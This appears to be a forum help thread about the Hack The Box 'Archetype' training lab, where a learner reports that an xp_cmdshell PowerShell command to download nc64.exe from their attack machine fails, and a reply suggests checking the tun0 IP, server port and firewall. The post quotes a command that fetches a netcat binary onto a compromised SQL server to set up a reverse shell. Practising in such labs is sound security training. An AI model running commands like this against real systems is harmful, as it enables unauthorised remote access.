“Accidentally removed my first post”
I’ve been trying to get through Archetype for the last couple of days and I’ve decided to finally ask for help lol
I’m stuck on this cmd "xp_cmdshell “powershell -c cd C:\Users\sql_svc\Downloads; wget
http://10.10.14.9/nc64.exe -outfile nc64.exe”
I replace the IP with my tun0 IP, I’m in the same folder as nc64.exe as are my simple server and my listener, but the SQL server keeps returning this error : wget : Unable to connect to the remote server.
This is day three that I’ve been trying to get through this box and I’m pulling my hair out because everything I see it works right away but I can’t for the life of me figure out what I’m doing wrong here!
Any help or advice would be greatly appreciated. Thank you in advance!
I’ve tried a reverse shell and that didn’t work
I’ve used ufw to open the firewall that didn’t work
I show activity when I curl my ip and port 80 but no dice on the SQL server
I’ve tried moving and renaming the nc64.exe
I’ve tried a different nc.exe
I’ve followed 4 different walkthroughs to the letter
I have no idea what to do at this point should I just skip the box? I feel like I’ll be missing out on really valuable information if I do.
The error indicates that that the SQL server was unable to connect to your machine. I would double check,
- Current tun0 IP address. It can change between sessions.
- Port the web server is running on, default is 8000.
- Status of UFW.
sudo ufw status versbose
I don’t see the name or exact nc binary being an issue here. If a reverse shell fails, that again probably points to the above troubleshooting of, IP, port, firewall status.
1 Like